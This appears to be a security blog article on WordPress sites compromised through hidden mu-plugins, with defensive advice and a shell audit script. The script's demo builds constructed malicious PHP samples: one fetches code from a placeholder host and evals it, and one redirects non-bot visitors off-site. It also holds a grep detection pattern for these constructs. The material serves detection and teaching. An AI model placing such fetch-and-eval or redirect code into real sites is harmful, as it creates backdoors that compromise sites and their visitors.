WordPress is one of the most popular platforms for building websites, but it’s also a prime target for cybercriminals looking to exploit vulnerabilities. Recently, a new trend has emerged: hackers are hiding malicious code in a specific folder within WordPress, known as the “mu-plugins” directory, to maintain remote access to sites and redirect unsuspecting visitors to harmful pages.
What Are mu-plugins?
“MU-plugins” stands for “Must-Use Plugins,” and they are stored in a special folder called wp-content/mu-plugins. Unlike regular plugins that need to be manually activated via the WordPress admin dashboard, MU-plugins automatically load when WordPress starts up. This feature makes them especially appealing for hackers who want to sneak malware into websites unnoticed.
Since MU-plugins don’t appear in the usual WordPress plugin interface, they are often overlooked during routine security checks, allowing hackers to carry out their attacks in relative secrecy.
The Malicious Trend: Redirects, Web Shells, and Spam
Researchers from the website security firm Sucuri have recently analyzed several incidents where hackers used MU-plugins to deliver different types of malicious scripts. Here’s a look at some of the most common ones:
redirect.php: This script redirects site visitors to malicious websites, often masquerading as a legitimate browser update. This tactic is used to trick users into downloading malware, which could steal personal information or load additional harmful payloads onto their systems.
index.php: A more dangerous type of attack, this script acts like a “web shell.” It lets hackers execute arbitrary code by downloading a remote PHP script. This gives them full control over the infected site.
custom-js-loader.php: This script replaces images on the site with explicit content and hijacks outbound links, potentially leading visitors to scammy websites. It may also manipulate SEO rankings, making it a harmful nuisance for website owners.
The Power of Deception
One particularly insidious feature of these attacks is that the redirect.php script has the ability to identify bots. This means it can avoid redirecting search engine crawlers, preventing these automated bots from detecting the malicious behavior. As a result, hackers can go unnoticed for longer, while real users are directed to harmful sites.
Why Is This Such a Big Deal?
These attacks are part of a broader trend where compromised WordPress sites are used to deploy malicious JavaScript. The goal is often to redirect users to third-party sites or steal financial information entered during checkout. This has become a serious problem, especially when hackers trick visitors into running malware under the guise of legitimate security checks like Google reCAPTCHA.
How Are WordPress Sites Being Breached?
While it’s still unclear how exactly these sites are being hacked, there are a few common vulnerabilities that could be to blame. These include weak admin passwords, vulnerable plugins or themes, and improper server configurations. It’s essential for WordPress site owners to be vigilant about these potential entry points.
Plugin Vulnerabilities You Should Know About
In 2025 alone, hackers have exploited several critical vulnerabilities in WordPress plugins to gain unauthorized access:
- CVE-2024-27956: A serious flaw in the WordPress Automatic Plugin (AI content generator and auto poster) that allows unauthorized SQL execution.
- CVE-2024-25600: A vulnerability in the Bricks theme that lets attackers execute remote code on the website.
- CVE-2024-8353: A vulnerability in the GiveWP plugin that allows attackers to execute remote code via PHP object injection.
- CVE-2024-4345: A file upload vulnerability in the Startklar Elementor Addons for WordPress that lets attackers upload arbitrary files to the server.
How Can You Protect Your WordPress Site?
As these attacks grow more sophisticated, it’s crucial for WordPress site owners to take proactive measures to secure their sites. Here are some tips to help you defend against these types of threats:
Keep Plugins and Themes Up-to-Date
Ensure that all your plugins and themes are running the latest versions, as outdated software can leave your site vulnerable.
Audit Your Plugins and Code Regularly
Review all plugins installed on your site, active or inactive, and don’t forget the wp-content/mu-plugins directory, which the Plugins screen does not show. Where possible, run periodic scans with your web host’s scanning tool or a security plugin such as Wordfence to check your WordPress files for malware or suspicious code.
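Because mu-plugins load on every request without activation and never appear in the Plugins screen (see “What Are mu-plugins?” above), the audit step is easiest to do straight on the server. The following POSIX shell script is an added example, not part of Sucuri’s report or of WordPress itself: it lists recently changed files in the mu-plugins directory and flags files carrying the traits described above (remote or decoded code execution, user-agent gating, hard-coded off-site redirects). The sample directory it builds is constructed for demonstration; the example.invalid host and file names are placeholders.

```shell
#!/bin/sh
# Read-only audit of wp-content/mu-plugins: inventory recent changes and flag files
# carrying constructs seen in the redirect, web-shell and link-hijack drop-ins above.
# WordPress runs every top-level .php file in this directory on each request, with no
# activation step and no entry in the Plugins screen, so a new file nobody installed
# is the clearest sign of a drop-in. Lists files changed in the last N days (default 7).
recent_mu_plugins() {
  dir="${1:-wp-content/mu-plugins}"; days="${2:-7}"
  [ -d "$dir" ] || return 0
  find "$dir" -type f -mtime "-$days" | sort
}
# Flag files with traits of the scripts described above: code execution fed by
# decoded or remotely fetched input, user-agent (bot) gating, and hard-coded
# off-site redirects. Prints one path per line; empty output means nothing matched.
flag_mu_plugins() {
  dir="${1:-wp-content/mu-plugins}"
  [ -d "$dir" ] || return 0
  pat='eval *\(|base64_decode *\(|gzinflate *\(|str_rot13 *\('
  pat="$pat"'|file_get_contents *\( *.https?:|HTTP_USER_AGENT|header *\( *.Location:'
  grep -rEl "$pat" "$dir" | sort
}
# Constructed sample (not real malware): one ordinary drop-in plus two files that
# carry the traits above. Prints the mu-plugins path it created.
make_sample_site() {
  d=$(mktemp -d)/wp-content/mu-plugins
  mkdir -p "$d"
  cat > "$d/site-helper.php" <<'EOF'
<?php // benign: a shortcode, no dynamic code or redirects
add_shortcode('year', function () { return date('Y'); });
EOF
  cat > "$d/redirect.php" <<'EOF'
<?php // constructed trait: skips crawlers, sends browsers off-site
if (stripos($_SERVER['HTTP_USER_AGENT'], 'bot') === false) {
    header('Location: https://example.invalid/update');
}
EOF
  cat > "$d/index.php" <<'EOF'
<?php // constructed trait: runs whatever a remote host returns
$p = file_get_contents('https://example.invalid/p.txt');
eval($p);
EOF
  echo "$d"
}
```

On a real site, source the script and run `recent_mu_plugins /path/to/wp-content/mu-plugins` and `flag_mu_plugins /path/to/wp-content/mu-plugins`; a flagged file is a lead to inspect by hand, not proof of compromise, since legitimate plugins occasionally use these functions too.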
Enforce Strong Passwords
Use complex, unique passwords for your admin and editor/contributor accounts, and encourage your users to do the same.
Use a Web Application Firewall (WAF)
A WAF can block malicious requests and stop code injection attempts before they reach WordPress, making it harder for hackers to compromise your site. Many WAF providers also bundle caching and CDN (content delivery network) services, which reduce the load on your server. Popular options include Cloudflare and Akamai.
Read more in Sucuri’s analysis report on their blog here.
Staying informed and implementing security best practices can help you protect your WordPress site from malicious attacks and keep your visitors safe.